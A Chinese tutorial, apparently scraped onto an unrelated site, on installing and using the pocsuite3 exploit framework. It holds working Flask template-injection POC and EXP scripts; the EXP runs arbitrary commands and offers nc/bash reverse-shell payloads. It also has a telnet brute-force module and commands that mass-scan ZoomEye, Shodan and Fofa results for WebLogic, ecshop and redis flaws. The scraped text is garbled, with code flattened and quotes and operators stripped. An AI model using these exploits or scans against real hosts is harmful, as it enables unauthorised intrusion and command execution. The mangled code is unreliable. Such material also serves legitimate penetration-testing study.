海丰县建设局官方网站wordpress哪种语言

当前位置: 首页 > news >正文

海丰县建设局官方网站,wordpress哪种语言,百家号如何给网站做推广,莱芜新闻联播pocsuite3安装及使用简介项目地址环境配置及安装环境要求安装#xff08;详情可以参考https://pocsuite.org/#xff09;使用方法运行模块加载目标参数#xff1a;Console模式查看有哪些模块使用Telnet 弱密码模块这里以flask模板注入漏洞为例pocs… pocsuite3安装及使用简介项目地址环境配置及安装环境要求安装详情可以参考https://pocsuite.org/使用方法运行模块加载目标参数Console模式查看有哪些模块使用Telnet 弱密码模块这里以flask模板注入漏洞为例pocsuite3 编写POC脚本批量验证方式pocsuite3 编写EXP脚本pocsuite3 编写console 形式调用搜索引擎接口Zoomeye搜索引擎Shodan搜索引擎Fofa搜索引擎从Seebug调用poc简介 pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。 项目地址 https://github.com/knownsec/pocsuite3 环境配置及安装 环境要求 Python 3.4Linux, Windows, Mac OSX, BSD 安装详情可以参考https://pocsuite.org/ 直接pip3安装 pip3 install pocsuite3或者下载最新的解压 wget https://github.com/knownsec/pocsuite3/archive/master.zip unzip master.zip pip3 install -r requirements.txt在Windows中 进入pocsuite目录执行python3 cli.py 查看帮助信息 python3 cli.py -h 输出这样即为pocsuite3 安装成功 在Linux中 直接输入pocsuite
使用方法 具体方法可以python cli.py -h或者pocsuite -h来自行查看 运行模块 –verity 验证 POC–attack 攻击 exp–shell加载目标参数 -u 选择单个目标 -f 从文件中导入多个目标 -r 选择poc -c 从配置文件中导入 -threads 设置线程verify 模式验证目标是否存在漏洞 pocsuite3 -r tests/poc_example.py -u http://www.example.com/ –verifyattack 模式向目标发起有效的攻击 pocsuite3 -r tests/poc_example.py -u http://www.example.com/ –attack批量验证将url写到一个txt pocsuite3 -r test/poc_example.py -f url.txt –verify加载 tests 目录下的所有 PoC 对目标进行测试可以充当扫描器角色 pocsuite3 -r tests/ -u http://www.example.com –verify使用多线程默认线程数为1 pocsuite3 -r test/ -f url.txt –verify –threads 10Console模式 类似于msf python console.py或者poc-console 查看有哪些模块 list使用Telnet 弱密码模块 Pocsuite3 use pocs\telnet_burst Pocsuite3 (pocs\telnet_burst) show options Pocsuite3 (pocs\telnet_burst) set rhost 192.168.8.1 Pocsuite3 (pocs\telnet_burst) set rport 23 run这里以flask模板注入漏洞为例 pocsuite3 编写POC脚本 主要编写poc定义的函数部分去做验证 poc-flask.py 脚本 from collections import OrderedDict from urllib.parse import urljoin import re from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORYclass DemoPOC(POCBase):vulID 1.1version 1.1author [1.1]vulDate 1.1createDate 1.1updateDate 1.1references [flask]name flaskappPowerLink flaskappName flaskappVersion flaskvulType VUL_TYPE.CODE_EXECUTIONdesc flasksamples []category POC_CATEGORY.EXPLOITS.REMOTEdef _verify(self):result {}path ?nameurl self.url path#print(url)payload {{22*22}}#print(payload)try:resq requests.get(url payload)if resq and resq.status_code 200 and 484 in resq.text:result[VerifyInfo] {}result[VerifyInfo][URL] urlresult[VerifyInfo][Name] payloadexcept Exception as e:return return self.parse_output(result)def _attack(self):return self._verify()def parse_output(self, result):output Output(self)if result:output.success(result)else:output.fail(target is not vulnerable)return outputregister_poc(DemoPOC)命令行 python3 cli.py -r /root/桌面/flask/poc-flask.py -u http://127.0.0.1:5000 –verify否则不存在
批量验证方式 python3 cli.py -r /root/桌面/flask/poc-flask.py –dork server:http –vuln-keyword flask搜索漏洞关键字flask, http协议的网址 失败没扫出来
pocsuite3 编写EXP脚本 主要编写exp定义的函数部分去做攻击 exp-flask.py 脚本 from collections import OrderedDict from urllib.parse import urljoin import re from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORYclass DemoPOC(POCBase):vulID 1.1version 1.1author [1.1]vulDate 1.1createDate 1.1updateDate 1.1references [1.1]name flackappPowerLink flackappName flaskappVersion flaskvulType VUL_TYPE.CODE_EXECUTIONdesc samples []category POC_CATEGORY.EXPLOITS.REMOTEdef _options(self):o OrderedDict()payload {nc: REVERSE_PAYLOAD.NC,bash: REVERSE_PAYLOAD.BASH,}o[command] OptDict(selectedbash, defaultpayload)return odef _verify(self):output Output(self)result {}def _attack(self):result {}path ?nameurl self.url path#print(url)cmd self.get_option(command)payload name%7B%25%20for%20c%20in%20%5B%5D.class.base.subclasses()%20%25%7D%0A%7B%25%20if%20c.name%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.init.globals.values()%20%25%7D%0A%20%20%7B%25%20if%20b.class%20%3D%3D%20%7B%7D.class%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27import(os).popen(cmd).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D#print(payload)try:resq requests.get(url payload)t resq.textt t.replace(\n, ).replace(\r, )print(t)t t.replace( ,)result[VerifyInfo] {}result[VerifyInfo][URL] urlresult[VerifyInfo][Name] payloadexcept Exception as e:returnreturn self.parse_attack(result)def parse_attack(self, result):output Output(self)if result:output.success(result)else:output.fail(target is not vulnerable)return outputregister_poc(DemoPOC)payload如下 {% for c in [].class.base.subclasses() %} {% if c.name catch_warnings %}{% for b in c.init.globals.values() %}{% if b.class {}.class %}{% if eval in b.keys() %}{{ beval }}{% endif %}{% endif %}{% endfor %} {% endif %} {% endfor %}命令行 python3 cli.py -r /root/桌面/flask/exp-flask.py -u http://127.0.0.1:5000 –attack –command ifconfigpocsuite3 编写console 形式 调用搜索引擎接口 参数 –dork DORK Zoomeye Dork 用于在ZoomEye 搜索目标 –max-page MAX_PAGE ZoomEye API 的请求翻页数10 目标/页 –search-type ZoomEye API 搜索类型web 或者 host –vul-keyword VULKEYWORD Seebug 搜索关键词用于在Seebug 搜索漏洞POCZoomeye搜索引擎 使用ZoomEye搜索ecshop并使用ecshop_rce.py探测指定线程数量为5 python3 cli.py -r pocs/ecshop_rce.py –dork ecshop –threads 5从ZoomEye中调用host批量验证某个POC pocsuite -r weblogic_CVE-2017-10271.py –dork weblogic –max-page 5 –thread 20 –verifyShodan搜索引擎 python3 cli.py -r pocs/redis_unauthorized_access.py –dork-shodan “product:redis” –shodan-token “xxxx”Fofa搜索引擎 python3 cli.py -r pocs/redis_unauthorized_access.py –dork-fofa service:redis –fofa-user “xxx –fofa-token “xxx从Seebug调用poc 使用ZoomEye搜索服务为redis的目标调用SSV-89339的poc来验证漏洞。 pocsuite -r ssvid-89339 –dork service:redis –max-page 1 –threads 10